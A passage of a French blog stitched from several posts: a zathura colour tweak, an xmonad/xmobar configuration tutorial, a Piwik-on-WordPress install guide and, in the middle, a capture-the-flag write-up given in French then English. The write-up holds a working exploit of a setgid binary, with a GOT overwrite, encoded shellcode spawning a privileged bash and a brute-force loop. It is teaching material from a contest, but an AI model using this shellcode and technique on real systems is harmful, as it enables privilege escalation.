set default_bgcolor #3F3F3F
set inputbar_fgcolor #dcdccc
set inputbar_bgcolor #3f3f3f
set statusbar_bgcolor #2f2f2f
set statusbar_fgcolor #dcaf8f

Et voilà, normalement vous devriez arriver à quelque chose comme ça:

(Et oui, j’ai récup’ un 19″ pas cher chez un pote la semaine dernière, à moi les joies du dual screen )

Petit edit post rédaction: en ce qui concerne zathura, vous avez aussi la possibilité de recoloriser le pdf, ie, d’utiliser les couleurs zenburn au lieu du classique blanc qui pète et du noir qui tue par défaut, en utilisant Ctrl-i. Et donc:

set recolor_darkcolor #dcdccc

set recolor_lightcolor #3f3f3f

pour obtenir de beaux pdfs zenburnés :] (sisi, jeu de mot à deux balles, je sais, je –>[⋅]

Meuh non. C’est pas plus dur que du lua, surtout pour ce qu’on veut faire: configurer xmonad.

I- Installation de xmonad.
Normalement, il ne devrait pas y avoir de problème, il doit être dans vos dépôts.

Sous ArchLinux:

yaourt -S xmonad xmonad-contrib xmobar

Le paquet xmonad se passe de commentaires, xmonad-contrib contient de nombreux addons (dont nous aurons besoin notamment pour rajouter de nouveaux layouts ) et xmobar nous permettra d’afficher une petite barre à la dzen – on peut aussi utiliser dzen2, mais xmobar a quelques avantages dans le cas de l’utilisation avec xmonad – c’est pas pour rien qu’il commence par « xmo », hein!
Une fois installé, vous pourrez le lancer soit via votre .xinitrc, votre .xsession ou votre login manager – je ne vais pas détailler tout le bousin, ce serait un peu long, alors autant vous passer un lien vers la doc d’xmonad (en angliche):

http://xmonad.org/documentation.html

Au premier lancement, vous devriez arriver à un splendide écran noir du plus bel effet, tellement d’ailleurs qu’une des premières entrées de la FAQ d’xmonad concerne justement ce « mais y’a rien à l’écran boudiou! ».

Normal, on a rien configuré. Faites donc un petit shift-alt-return pour lancer un xterm (beurk, on va remplacer ça par urxvt – c’est même une des premières choses que l’on va faire).

La configuration par défaut, très basique, propose les mêmes raccourcis clavier qu’un awesome/dwm – là aussi, on peut remplacer Alt par Mod4, etc, on va y venir – cependant, étant l’heureux possesseur d’un clavier IBM Model M (de 1991), je me sers de la bonne vieille touche Alt pour mes raccourcis (pensez-y quand je vous montrerai, par exemple, comment rajouter de nouveaux raccourcis clavier).

Un petit récapitulatif vite fait:

S-Alt-Return : xterm

Alt-j/k : passer d’un client à l’autre, avec shift on intervertit les clients, classique

Alt-h/l : diminue/augmente la taille du master

Alt-Return: passe le client sélectionné en master

Alt-Space: changement de layout (pour le moment, 3 layouts, on va en rajouter tout à l’heure )

Ce n’est pas une liste exhaustive, et si vous utilisez un clavier français, pour le moment, vous ne pouvez pas changer de workspace – on va y venir dans la configuration.

II- Le gros morceau: la configuration d’Xmonad.
Bon, pour le moment, Xmonad saybingentil© mais c’est un peu chiant. On va égayer tout ça!

Tout d’abord, le fichier de conf’ se trouve dans ~/.xmonad/ et s’appelle xmonad.hs.

S’il n’existe pas, créez le avec votre éditeur de texte favori! Plutôt que de vous faire un copié collé du mien, je vais vous le détailler en plusieurs parties. Je vous conseille de copier le fichier /usr/share/xmonad-0.9.2/man/xmonad.hs dans ~/.xmonad/ afin de bien voir ce que je modifie.

Tout d’abord: importation des libs XMonad:

import XMonad
import Data.Monoid
import System.Exit
import XMonad.Hooks.DynamicLog
import qualified XMonad.StackSet as W
import qualified Data.Map                 as M
import XMonad.Hooks.ManageDocks
import XMonad.Util.Run(spawnPipe)
import XMonad.Util.EZConfig(additionalKeys)
import XMonad.Actions.CycleWS
import XMonad.Layout.Circle
import XMonad.Layout.ResizableTile
import XMonad.Layout.Tabbed
import XMonad.Layout.Spiral
import XMonad.Layout.Magnifier
import System.IO

Les six premiers « import » (comme en lua, en python, équivalent aux include en C), sont les imports « de base » d’XMonad.

Viennent ensuite:

• ManageDocks: ça va nous permettre de gérer xmobar ou dzen2, en lui réservant un espace sur l’écran, qui ne sera pas recouvert par les autres clients – tout comme le padding de ratpoison, par exemple.
• Run(spawnPipe): nous permettra d’envoyer des informations d’XMonad au stdin de xmobar (workspace, layout, titre du client)
• EZConfig(additionalKeys): pour rajouter facilement des raccourcis clavier à la fin du fichier de conf’ d’xmonad
• Actions.CycleWS: va nous permettre de binder quelques touches pour cycler entre les workspaces
• Layout.*: différents layouts que nous allons utiliser – il y en a un gros paquet, et de plus il existe aussi un mode Combo, sur lequel je reviendrai lorsque je l’aurai testé (donc pas aujourd’hui ^^)

myTerminal = « urxvt »

myFocusFollowsMouse :: Bool

myFocusFollowsMouse = False (ou True, dépend de vos goûts en la matière)

myBorderWidth = 1 (taille de la bordure autour du client sélectionné)

myModMask = mod1Mask (mod4Mask pour la touche zindoze)

myWorkspaces = ["1", "2",…blabla,"9"] (on peut aussi mettre des noms, ["main","blabla","trucmuche",…etc] )

myNormalBorderColor = « #3f3f3f » (la couleur pour le bord d’une fenêtre sans focus)

myFocusedBorderColor = « #6f6f6f » (je vous laisse deviner…)

Ensuite, nous allons définir la liste de nos layouts:

myOwnLayout = tiled ||| Mirror tiled ||| magnifier (Circle) ||| ResizableTall 1 (3/100) (1/2) [] ||| spiral (6/7) ||| simpleTabbed ||| Full

where

tiled = Tall nmaster delta ratio

nmaster = 1

ratio = 1/2

delta = 3/100

Notez que j’aurai pu faire de même pour ResizableTall, en l’appellant resizetall, puis en le définissant dans le where: resizetall = ResizableTall nmaster delta ratio []

nmaster: le nombre de fenêtres dans le master, delta: le pourcentage de l’écran modifié à chaque redimensionnement via Alt-h/l, ratio: partage de l’écran par défaut (une moitié pour le master, l’autre moitié pour le reste)

Vous remarquerez que je n’ai pas touché aux raccourcis claviers par rapport à la config par défaut, et de même, je ne modifie pas myManageHook.

Idem pour les autres Hooks (myLogHook, myStartupHook, etc)

Ensuite, on charge notre conf’ par défaut dans la variable defaults:

defaults = defaultConfig {
– simple stuff
terminal           = myTerminal,
focusFollowsMouse  = myFocusFollowsMouse,
borderWidth        = myBorderWidth,
modMask            = myModMask,
numlockMask        = myNumlockMask,
workspaces         = myWorkspaces,
normalBorderColor  = myNormalBorderColor,
focusedBorderColor = myFocusedBorderColor,

– key bindings
keys               = myKeys,
mouseBindings      = myMouseBindings,

– hooks, layouts

manageHook         = myManageHook,
handleEventHook    = myEventHook,
logHook            = myLogHook,
startupHook        = myStartupHook
}

Là, comme vous le voyez, j’ai viré le layout = myLayout, par rapport à la conf par défaut, vous allez voir un peu plus bas pourquoi, puisque nous arrivons au bout du fichier de conf’:

main = do
xmproc <- spawnPipe « /usr/bin/xmobar »
xmonad $ defaultConfig
{ manageHook = manageDocks <+> manageHook defaultConfig
, layoutHook = avoidStruts $ myOwnLayout
, logHook = dynamicLogWithPP xmobarPP
{ ppOutput = hPutStrLn xmproc
, ppTitle = xmobarColor « lightblue » «  » . shorten 50
}
, modMask = mod1Mask
, terminal = myTerminal
, focusFollowsMouse = myFocusFollowsMouse
, workspaces = myWorkspaces
, normalBorderColor  = myNormalBorderColor
, focusedBorderColor = myFocusedBorderColor

} `additionalKeys`
[ ((0, xK_Pause), spawn "mpc --no-status toggle")
, ((0, xK_Print), spawn "mpc --no-status prev")
, ((0, xK_Scroll_Lock), spawn "mpc --no-status next")
, ((mod1Mask, xK_u ), sendMessage (IncMasterN 1))
, ((mod1Mask, xK_i ), sendMessage (IncMasterN (-1)))
, ((mod1Mask, xK_Right), nextWS)
, ((mod1Mask, xK_Left), prevWS)
, ((mod1Mask .|. shiftMask, xK_Right), shiftToNext >> nextWS)
, ((mod1Mask .|. shiftMask, xK_Left), shiftToPrev >> prevWS)
, ((mod1Mask,               xK_p     ), spawn "dmenu_run -i -nb '#3F3F3F' -nf '#DCDCCC' -sb '#1E2320' -sf '#F0DFAF'")
, ((mod1Mask,             xK_a), sendMessage MirrorShrink)
, ((mod1Mask,              xK_z), sendMessage MirrorExpand)
]

Oui, ça fait un peu peur! Bon, ligne par ligne:

main = do     No Comment!!!

xmproc <- spawnPipe « /usr/bin/xmobar »  On envoie les données de Xmonad au stdin de xmobar – regardez au début du fichier, nous avons importé cette fonction et c’est pas pour rien!

xmonad $ defaultConfig  on charge la config par défaut d’xmonad puis:

{ manageHook = manageDocks <+> manageHook defaultConfig
, layoutHook = avoidStruts $ myOwnLayout

Là, avoidStruts nous permet de réserver une petite place pour notre pote xmobar (dont on va parler dans pas longtemps ), et on charge NOS layouts et pas ceux par défaut

, logHook = dynamicLogWithPP xmobarPP
{ ppOutput = hPutStrLn xmproc
, ppTitle = xmobarColor « lightblue » «  » . shorten 50
}

Là, on définit ce qu’XMonad va envoyer à notre pote xmobar.

Le reste coule de source, jusqu’au:

`additionalKeys`

[

vos raccourcis clavier

]

comme vous le voyez, j’utilise les vieilles touches Print, Scroll Lock, et pause pour contrôler mpd via mpc, alt-u/i me permet d’ajouter/enlever un client du master, Alt-gauche/droite me permet (enfin! je vous avais bien dit qu’on allait y arriver) de passer d’un workspace à l’autre (là aussi, regardez bien ce qu’on a importé en début de fichier ) shift-alt-gauche/droite me permet d’envoyer une appli d’un workspace à l’autre. Vous noterez aussi le Alt-p, qui me lance dmenu avec des couleurs « zenburn » au lieu du dmenu de base dans la conf’ par défaut. Alt-a/z me permet de redimensionner un client verticalement en mode ResizableTall – un peu comme wmii.

Bien évidemment vous pouvez toujours remplacer mod1Mask par mod4Mask, etc…

Notez aussi la commande spawn « blabla », qui permet d’exécuter un programme dans le $PATH en l’associant à une touche du clavier/combo de touches.

Dernier petit détail, pour que xmonad prenne en compte vos changements, Alt-q permet de le recompiler et – si tout s’est bien déroulé – de le relancer. En cas d’erreur, vous verrez un xmessage apparaître avec l’erreur en question, la(les) ligne(s) concernée(s) et une solution possible.

Bon, votre xmonad devrait déjà avoir un peu plus de gueule! Il reste juste à remplir un peu notre pote xmobar d’infos intéressantes :] Et ça, ça se bidouille dans le fichier ~/.xmobarrc

III- Exemple de .xmobarrc.

Bon, tout d’abord je vous conseille fortement de lire le man d’xmobar, il y a pas mal d’options et ce serait un peu long de toutes les détailler. En attendant, voici le mien:

Config { font = « -*-terminus-*-*-*-*-12-*-*-*-*-*-*-u »
, bgColor = « #3F3F3F »
, fgColor = « #dcdccc »
, position = Top
, lowerOnStart = True
, commands = [ Run Network "eth0" ["-L", "8", "-H", "32", "-l", "#C9A34E", "-n", "#429942" ,"-h", "#A36666", "-t", "dl: <rx> Kio/s - ul: <tx> Kio/s"] 10
, Run Memory ["-t","Mem: <usedratio>%"] 10
, Run Com « mpc » ["| head -n1"] «  » 50
, Run MultiCpu ["-t <total0>% <total1>%"] 50
, Run Weather « LFRS » ["-t"," <tempC>°C","-L","10","-H","22","--normal","lightgreen","--high","#C33B3B","--low","lightblue"] 18000
, Run Date « %a %b %_d %Y %H:%M:%S » « date » 10
, Run StdinReader
]
, sepChar = « % »
, alignSep = « }{ »
, template =  » %StdinReader% }{ <fc=#dfaf8f>[</fc> ♫: %mpc% <fc=#dfaf8f>|</fc> #:%multicpu% <fc=#dfaf8f>|</fc> %memory% <fc=#dfaf8f>|</fc> %eth0% <fc=#dfaf8f>|</fc> ☼:%LFRS% %date% <fc=#dfaf8f>]</fc> »
}

Important: le Run StdinReader! C’est ce qui nous permet de lire ce qu’XMonad va envoyer au stdin d’xmobar

De même, si vous voulez lancer une commande externe à xmobar, Run Com « nomdelacommande » ["paramètres / pipe"] «  » intervalle en dixième de secondes.

Comme vous voyez, xmobar est assez complet et nous permet d’afficher pas mal de choses. Petite note au niveau de Weather (météo): habitant à Nantes, ma station est LFRS, vous pourrez trouver une liste complète ici:

http://weather.noaa.gov

Et la doc d’xmobar:

http://projects.haskell.org/xmobar/

Et pour finir, un petit screenshot de chez moi:

L’intitulé est :
It seems like AED also has some plans to raise hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag on the program.
So we can get the secret key!

Ok, allons-y.
exp_23@a5:~$ cd /opt/pctf/exploit/
exp_23@a5:/opt/pctf/exploit$ ls -l
total 8
-rwxr-sr-x 1 root expkey 3448 Apr 21 12:05 exploitMe
-rw-r----- 1 root expkey 27 Apr 21 12:06 key


Lançons le pour voir le nombre d’arguments ou autre chose…
exp_23@a5:/opt/pctf/exploit$ ./exploitMe
Regards, Dolan :}
exp_23@a5:/opt/pctf/exploit$ ./exploitMe 1
Regards, Dolan :}
exp_23@a5:/opt/pctf/exploit$ ./exploitMe 1 1
Regards, Dolan :}
exp_23@a5:/opt/pctf/exploit$ ./exploitMe 1 1 1
Segmentation fault

Je pense que c’est l’heure de sortir gdb. (J’utilise un .gdbinit fourni par https://www.reverse-engineering.net avant qu’ils ne ferment, un grand merci à eux. PS: il peut aussi être trouvé ici).

exp_23@a5:/opt/pctf/exploit$ gdb ./exploitMe
[...]
Reading symbols from /opt/pctf/exploit/exploitMe...(no debugging symbols found)...done.
gdb$ run 1 2 3
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x00000003 EBX: 0x00000003 ECX: 0x00000001 EDX: 0x00000002 o d I t s z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0xBFDEE6F8 ESP: 0xBFDEE660 EIP: 0x080485B2
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
0x80485b2: mov %edx,(%eax)
0x80485b4: movl $0x0,(%esp)
0x80485bb: call 0x8048434 <exit@plt>
0x80485c0: add $0x6c,%esp
0x80485c3: ret
0x80485c4: sub $0x2c,%esp
0x80485c7: mov $0x80486d3,%eax
0x80485cc: movl $0x5,0x8(%esp)
--------------------------------------------------------------------------------
0x080485b2 in ?? ()

Le mov où le segfault se produit est très intéressant. En effet, il écrit le contenu de %edx dans l'adresse pointée par %eax. Mais attendez... On contrôle %eax et %edx !
Vous voyez leurs valeurs ? Ils correspondent au troisième argument (pour %eax) et au deuxième argument (pour %edx). Mais ce n'est pas aussi simple. En effet le troisième argument doit être inférieur à 71 sinon le programme se termine. Impossible d'insérer une adresse complète en ayant moins de 71 comme valeur... Tentons autre chose.

gdb$ run $(perl -e 'print "A"x50 . "BBBB"') 31337 69

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x42424242 EBX: 0x00000045 ECX: 0x00000000 EDX: 0x00007A69 o d I t s z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0xBFA67E58 ESP: 0xBFA67DC0 EIP: 0x080485B2
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
0x80485b2: mov %edx,(%eax)
0x80485b4: movl $0x0,(%esp)
0x80485bb: call 0x8048434 <exit@plt>
0x80485c0: add $0x6c,%esp
0x80485c3: ret
0x80485c4: sub $0x2c,%esp
0x80485c7: mov $0x80486d3,%eax
0x80485cc: movl $0x5,0x8(%esp)
--------------------------------------------------------------------------------
0x080485b2 in ?? ()

Gagné ! Maintenant souvenons nous que l'ASLR (randomization de l'adressage mémoire) et le bit NX (stack non exécutable) sont de la partie. Regardons ça :
0x80485bb: call 0x8048434 <exit@plt>
C'est seulement 2 instructions après celle qui segfault. Ça vous dis un petit ret2got un peu spécial ?

exp_23@a5:/opt/pctf/exploit$ objdump -d -j .plt ./exploitMe | grep exit -A4
08048434 <exit@plt>:
8048434: ff 25 f4 97 04 08 jmp *0x80497f4
804843a: 68 40 00 00 00 push $0x40
804843f: e9 60 ff ff ff jmp 80483a4 <__gmon_start__@plt-0x10>

On va réécrire la valeur à l'adresse 0x80497f4 pour qu'elle tombe sur l'adresse de notre shellcode.
Le shellcode sera en variable d'environnement et avec un joli tobogan de plus de 9000 NOP. (It's over 9000). Le shellcode drop un bash avec l'argument -p pour préserver l'euid.


export SCH=$(perl -e 'print "\x90"x10000 . "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"')

L'adresse du shellcode est entre 0xbf800000 and 0xbfff-------- à cause de l'ASLR, utilisons 0xbfaa57dc comme adresse, c'est joli. En décimal cela donne 3215611868.

Maintenant que nous savons tout ça, bruteforçons un peu...

while true; do ./exploitMe $(perl -e 'print "A"x64 . "\xf4\x97\x04\x08"') 3215611868 69; done
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
[...]
Segmentation fault
Segmentation fault
bash-4.1$ id
uid=6023(exp_23) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers)
bash-4.1$ cat key
K3Ys_t0_15_M1nUtEs_0f_F4mE


It seems like AED also has some plans to raise hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag on the program.
So we can get the secret key!

Ok, let’s go.
exp_23@a5:~$ cd /opt/pctf/exploit/
exp_23@a5:/opt/pctf/exploit$ ls -l
total 8
-rwxr-sr-x 1 root expkey 3448 Apr 21 12:05 exploitMe
-rw-r----- 1 root expkey 27 Apr 21 12:06 key


Let’s run it to check the number of args and whatever…
exp_23@a5:/opt/pctf/exploit$ ./exploitMe
Regards, Dolan :}
exp_23@a5:/opt/pctf/exploit$ ./exploitMe 1
Regards, Dolan :}
exp_23@a5:/opt/pctf/exploit$ ./exploitMe 1 1
Regards, Dolan :}
exp_23@a5:/opt/pctf/exploit$ ./exploitMe 1 1 1
Segmentation fault

It’s time for some gdb stuff. (I use the .gdbinit that https://www.reverse-engineering.net provided for a long time, thanks to them for all their work. PS: it can be found here)
exp_23@a5:/opt/pctf/exploit$ gdb ./exploitMe
[...]Reading symbols from /opt/pctf/exploit/exploitMe...(no debugging symbols found)...done.
gdb$ run 1 2 3
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x00000003 EBX: 0x00000003 ECX: 0x00000001 EDX: 0x00000002 o d I t s z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0xBFDEE6F8 ESP: 0xBFDEE660 EIP: 0x080485B2
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
0x80485b2: mov %edx,(%eax)
0x80485b4: movl $0x0,(%esp)
0x80485bb: call 0x8048434 <exit@plt>
0x80485c0: add $0x6c,%esp
0x80485c3: ret
0x80485c4: sub $0x2c,%esp
0x80485c7: mov $0x80486d3,%eax
0x80485cc: movl $0x5,0x8(%esp)
--------------------------------------------------------------------------------
0x080485b2 in ?? ()

The mov where the segfault occurs is very interesting. It writes the content of %edx to the address pointed by %eax. But, wait... We both control %eax and %edx !
You see the values ? They correspond to the third argument (for %eax) and the second argument (for %edx).

But it's not as simple, the third argument must be under 71 or it exits. Let's try something else to control %eax.

gdb$ run $(perl -e 'print "A"x50 . "BBBB"') 31337 69

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 0x42424242 EBX: 0x00000045 ECX: 0x00000000 EDX: 0x00007A69 o d I t s z a P c
ESI: 0x00000000 EDI: 0x00000000 EBP: 0xBFA67E58 ESP: 0xBFA67DC0 EIP: 0x080485B2
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
--------------------------------------------------------------------------[code]
0x80485b2: mov %edx,(%eax)
0x80485b4: movl $0x0,(%esp)
0x80485bb: call 0x8048434 <exit@plt>
0x80485c0: add $0x6c,%esp
0x80485c3: ret
0x80485c4: sub $0x2c,%esp
0x80485c7: mov $0x80486d3,%eax
0x80485cc: movl $0x5,0x8(%esp)
--------------------------------------------------------------------------------
0x080485b2 in ?? ()

Win ! Now, remember that ASLR is on and the NX bit is set. Look at this :
0x80485bb: call 0x8048434 <exit@plt>
It's only 2 instructions after the one which segfault. Let's ret2got.

exp_23@a5:/opt/pctf/exploit$ objdump -d -j .plt ./exploitMe | grep exit -A4
08048434 <exit@plt>:
8048434: ff 25 f4 97 04 08 jmp *0x80497f4
804843a: 68 40 00 00 00 push $0x40
804843f: e9 60 ff ff ff jmp 80483a4 <__gmon_start__@plt-0x10>

We will rewrite the value at 0x80497f4 with the address of our shellcode.

We'll put a shellcode with a big NOP sled (over 9000 NOPs) in some environment variable. The shellcode drops a bash shell with -p to preserve rights.

export SCH=$(perl -e 'print "\x90"x10000 . "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"')

The shellcode's address is between 0xbf800000 and 0xbfff--------, let's use 0xbfaa57dc as an address for it. In decimal base it's 3215611868.

Now, let's bruteforce a bit :

while true; do ./exploitMe $(perl -e 'print "A"x64 . "\xf4\x97\x04\x08"') 3215611868 69; done
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
[...]
Segmentation fault
Segmentation fault
bash-4.1$ id
uid=6023(exp_23) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers)
bash-4.1$ cat key
K3Ys_t0_15_M1nUtEs_0f_F4mE

The key is K3Ys_t0_15_M1nUtEs_0f_F4mE.

Many thanks to ZaZo0o and lestat for the review.

Installation de Piwik

L’installation de Piwik est très simple, bien qu’il y a un cas particulier que j’ai rencontré, qui peut poser un souci (nous le détaillerons plus bas).

La première étape est de télécharger Piwik sur le site officiel http://piwik.org/ et de cliquer sur l’onglet Download Piwik. Notez aussi la présence d’un menu « Online demo », si vous voulez tester la bête avant de l’installer. Vérifiez aussi la présence de 2 pré-requis pour Piwik : une base de donnée et php.

Si vous procédez à l’installation via ssh, rien de plus simple : rendez-vous dans votre documentRoot (base du dossier web), wget « http://piwik.org/latest.zip », unzip latest.zip et hop, vous avez un dossier piwik dans votre documentRoot.

Si vous procédez à l’installation via ftp, dézippez le fichier en local sur votre pc puis uploadez le dossier et son contenu sur votre ftp, dans le même dossier que votre wordpress.

Pour continuer l’installation, il suffit de se rendre sur ce dossier piwik avec votre navigateur web, et un joli installateur vous demandera pleins de renseignements, à vous de les compléter correctement. Il n’y a normalement pas de soucis à cette étape, l’installateur étant très clair.

Concernant mon problème, lors de l’installation j’avais le message « Error: it seems you tried to skip a step of the Installation process, or your cookies are disabled, or the Piwik configuration file was already created. ». Après vérifications, le problème ne venait pas de moi (enfin pas directement), mes cookies étant activés et le fichier de configuration de Piwik n’étant pas présent. Le problème était en fait dans la configuration de mon reverse proxy/cache nginx. En effet, après avoir rajouté une petite règle qui redirige toutes les requêtes sur /piwik/ vers le backend, le problème fût corrigé. N’hésitez donc pas, si vous avez le même problème et que vous avez un reverse-proxy/cache à vérifier sa configuration.

EDIT: Matthieu Aubry m’a gentillement envoyé un lien vers la faq de piwik sur twitter (ici pour le twitt et ici pour le point de la faq) concernant la conf si piwik tourne derrière un reverse-proxyx. Merci à lui

Installation dans WordPress

Une fois l’installation de piwik effectué, nous allons maintenant relier piwik avec notre blog. Pour cela, dans votre interface d’administration wordpress, allez dans le menu « Extensions » puis cliquez sur « Ajouter ». Dans le champs de recherche, écrivez « Piwik Analytics » puis effectuez la recherche. Une extension du même nom devrait apparaître. Cliquez sur le lien « Installer maintenant », situé juste sous le nom de l’extension. Au bout de quelques instants l’extension devrait être installé. Passons à sa configuration. Pour cela rendez vous dans le menu Extensions de votre wordpress, onglet Extensions. Cherchez le module que l’on a précedemment installé, et cliquez sur « Configuration Page ». Dans la case « Piwik site id », indiquez « 1 ». Cette case sert dans le cas où vous voudriez que votre installation piwik serve pour plusieurs sites. Si tel est le cas, indiquez un id différent pour chacun de vos sites. Laissez la case « Track Downloads » cochée, ou cochez  là si ce n’est pas le cas. Cette option sert pour pouvoir « suivre » les téléchargements effectués par les visiteurs. Laissez « Hostname of the Piwik Server » vide si l’installation du piwik est située sur le même serveur que votre blog. Cette option est utile si vous avez installé votre piwik sur un vhost/serveur différent. Pour « Base URL path of piwik installation », indiquez « /piwik/ », cela correspond au dossier d’instalation de piwik, modifiez cette valeur si votre piwik n’est pas installé dans ce dossier. Enfin, laissez la case « Track the admin user too » décochée. Cette case indique s’il faut prendre en compte dans les statistiques les visites de l’administrateur du blog (vous), il faut donc la laisser à false pour ne pas biaiser les statistiques. Enfin validez vos choix en cliquand sur « update settings ». Voilà, votre piwik est installé et configuré.

Utilisation

Concernant l’utilisation, il suffit de se rendre dans le dossier de piwik (http://votreblog.example.fr/piwik/ par exemple) pour voir les statistiques de votre blog. Il y a ici de nombreux menus et possibilités, dont je vais vous laisser le plaisir d’explorer les moindres recoins